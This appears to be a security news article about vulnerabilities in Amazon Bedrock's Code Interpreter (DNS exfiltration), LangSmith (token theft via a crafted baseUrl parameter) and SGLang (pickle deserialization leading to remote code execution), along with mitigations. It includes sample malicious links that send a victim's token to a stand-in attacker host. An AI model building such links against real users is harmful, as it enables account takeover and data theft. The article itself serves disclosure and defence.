Security researchers have identified critical vulnerabilities in popular AI platforms including Amazon Bedrock, LangSmith, and SGLang that could enable attackers to exfiltrate sensitive data and execute arbitrary code. These findings highlight emerging security challenges in rapidly expanding AI ecosystems.
The rapid adoption of artificial intelligence platforms has introduced new security vectors that organizations must address to protect sensitive data and maintain system integrity. Recent research has uncovered critical vulnerabilities in several leading AI platforms that, if exploited, could enable attackers to bypass security controls, exfiltrate confidential information, and execute arbitrary code within production environments.

Amazon Bedrock DNS Bypass Vulnerability
BeyondTrust researchers have disclosed a significant security flaw in Amazon Bedrock's AgentCore Code Interpreter that undermines the platform's network isolation guarantees. Despite being designed to execute code in isolated sandbox environments, the service permits outbound DNS queries that can be abused by attackers to establish command-and-control channels and exfiltrate data.
"This research demonstrates how DNS resolution can undermine the network isolation guarantees of sandboxed code interpreters," explained Kinnaird McQuade, chief security architect at BeyondTrust. "By using this method, attackers could have exfiltrated sensitive data from AWS resources accessible via the Code Interpreter's IAM role, potentially causing downtime, data breaches of sensitive customer information, or deleted infrastructure."
The vulnerability, which carries a CVSS score of 7.5 out of 10.0, allows attackers to:
- Establish bidirectional communication channels using DNS queries and responses
- Obtain interactive reverse shells
- Exfiltrate sensitive information through DNS queries (if the IAM role has appropriate permissions)
- Deliver additional payloads via DNS queries that the Code Interpreter executes
- Poll DNS command-and-control servers for commands stored in DNS A records
Amazon Bedrock AgentCore Code Interpreter, launched in August 2025, is designed to enable AI agents to securely execute code in isolated environments. However, the fact that it allows DNS queries despite "no network access" configuration creates a significant security risk.
Following responsible disclosure in September 2025, Amazon determined the issue to be intended functionality rather than a defect, urging customers to use VPC mode instead of sandbox mode for complete network isolation. The company also recommends using a DNS firewall to filter outbound DNS traffic.
"To protect sensitive workloads, administrators should inventory all active AgentCore Code Interpreter instances and immediately migrate those handling critical data from Sandbox mode to VPC mode," advised Jason Soroko, senior fellow at Sectigo. "Operating within a VPC provides the necessary infrastructure for robust network isolation, allowing teams to implement strict security groups, network ACLs, and Route53 Resolver DNS Firewalls to monitor and block unauthorized DNS resolution. Finally, security teams must rigorously audit the IAM roles attached to these interpreters, strictly enforcing the principle of least privilege to restrict the blast radius of any potential compromise."
LangSmith Account Takeover Vulnerability
Separately, Miggo Security researchers have disclosed a high-severity security flaw in LangSmith (CVE-2026-25750, CVSS score: 8.5) that exposes users to potential token theft and account takeover. The vulnerability affects both self-hosted and cloud deployments of the AI observability platform.
The issue stems from URL parameter injection resulting from insufficient validation of the baseUrl parameter. Attackers can exploit this to steal a signed-in user's bearer token, user ID, and workspace ID by tricking victims into clicking specially crafted links:
- Cloud: smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com
- Self-hosted: /studio/?baseUrl=https://attacker-server.com
"A logged-in LangSmith user could be compromised merely by accessing an attacker-controlled site or by clicking a malicious link," stated Miggo researchers Liad Eliyahu and Eliana Vuijsje. "This vulnerability is a reminder that AI observability platforms are now critical infrastructure. As these tools prioritize developer flexibility, they often inadvertently bypass security guardrails. This risk is compounded because, like 'traditional' software, AI Agents have deep access to internal data sources and third-party services."
Successful exploitation could allow attackers to gain unauthorized access to the AI's trace history, as well as expose internal SQL queries, CRM customer records, or proprietary source code by reviewing tool calls.
The vulnerability has been addressed in LangSmith version 0.12.71 released in December 2025. Organizations using LangSmith should ensure they have updated to this patched version and implement additional security measures such as:
- Implementing strict URL validation in web applications
- Using content security policies (CSP) to prevent unauthorized connections
- Conducting regular security awareness training for developers
- Implementing multi-factor authentication to limit the impact of compromised credentials
SGLang Unsafe Pickle Deserialization Vulnerabilities
Orca Security researcher Igor Stepansky has identified multiple critical vulnerabilities in SGLang, an open-source framework for serving large language models and multimodal AI models. These flaws involve unsafe pickle deserialization that could lead to remote code execution.
Three distinct vulnerabilities have been identified:
CVE-2026-3059 (CVSS score: 9.8): An unauthenticated remote code execution vulnerability through the ZeroMQ (ZMQ) broker, which deserializes untrusted data using pickle.loads() without authentication. This affects SGLang's multimodal generation module.
CVE-2026-3060 (CVSS score: 9.8): An unauthenticated remote code execution vulnerability through the disaggregation module, which deserializes untrusted data using pickle.loads() without authentication. This affects SGLang's encoder parallel disaggregation system.
CVE-2026-3989 (CVSS score: 7.8): The use of an insecure pickle.load() function without validation and proper deserialization in SGLang's "replay_request_dump.py," which can be exploited by providing a malicious pickle file.
"The first two allow unauthenticated remote code execution against any SGLang deployment that exposes its multimodal generation or disaggregation features to the network," Stepansky explained. "The third involves insecure deserialization in a crash dump replay utility."
In a coordinated advisory, the CERT Coordination Center (CERT/CC) confirmed that SGLang is vulnerable to CVE-2026-3059 when the multimodal generation system is enabled, and to CVE-2026-3060 when the encoder parallel disaggregation system is enabled.
"If either condition is met and an attacker knows the TCP port on which the ZMQ broker is listening and can send requests to the server, they can exploit the vulnerability by sending a malicious pickle file to the broker, which will then deserialize it," CERT/CC stated.

Mitigation Strategies for AI Platform Vulnerabilities
These vulnerabilities highlight the need for enhanced security practices in AI deployments. Organizations should consider the following mitigation strategies:
For Amazon Bedrock Users:
- Immediately migrate critical workloads from Sandbox mode to VPC mode
- Implement DNS firewalls to filter and monitor outbound DNS traffic
- Regularly audit IAM roles attached to Code Interpreter instances
- Follow the principle of least privilege when configuring permissions
For LangSmith Users:
- Update to version 0.12.71 or later to address the CVE-2026-25750 vulnerability
- Implement additional URL validation mechanisms
- Deploy content security policies to prevent unauthorized connections
- Conduct security awareness training for developers using the platform
For SGLang Users:
- Restrict access to service interfaces and ensure they are not exposed to untrusted networks
- Implement network segmentation and access controls for ZeroMQ endpoints
- Consider disabling multimodal generation and encoder disaggregation features if not required
- Monitor for suspicious activities such as unexpected connections, processes, or file creations
General AI Security Best Practices:
- Regularly update and patch AI platforms and their dependencies
- Implement network segmentation to limit the blast radius of potential compromises
- Conduct regular security assessments of AI deployments
- Monitor for anomalous behavior in AI systems
- Implement logging and alerting for security-relevant events
- Follow the principle of least privilege for all AI service accounts
- Regularly audit permissions and access controls
The Growing Security Challenge in AI
These vulnerabilities underscore the evolving security landscape in artificial intelligence. As AI systems become more integrated into critical business processes, the potential impact of security incidents grows significantly.
"AI platforms are becoming critical infrastructure, and their security cannot be an afterthought," said security researcher Eliana Vuijsje. "As these tools prioritize developer flexibility, they often inadvertently bypass security guardrails. This risk is compounded because AI agents have deep access to internal data sources and third-party services."
Organizations must adopt a security-first approach when implementing AI technologies, incorporating security considerations throughout the development lifecycle rather than treating them as an afterthought. This includes secure coding practices, thorough testing, and robust monitoring of AI systems in production environments.
The rapid evolution of AI technologies presents both opportunities and challenges for security professionals. By staying informed about emerging vulnerabilities and implementing appropriate security controls, organizations can harness the power of AI while minimizing associated risks.
For more information on these vulnerabilities:
- Amazon Bedrock: AWS Security Blog
- LangSmith: Miggo Security Advisory
- SGLang: CERT/CC Advisory

This article has covered three significant vulnerabilities affecting major AI platforms. As AI continues to transform business operations, security must remain a top priority. Organizations should review their AI deployments for these vulnerabilities and implement appropriate mitigations to protect sensitive data and maintain system integrity.
The findings highlight the need for continued vigilance and investment in AI security as these technologies become increasingly prevalent in enterprise environments. By addressing these vulnerabilities promptly and implementing robust security practices, organizations can better protect themselves against the evolving threat landscape in AI.

Comments
Please log in or register to join the discussion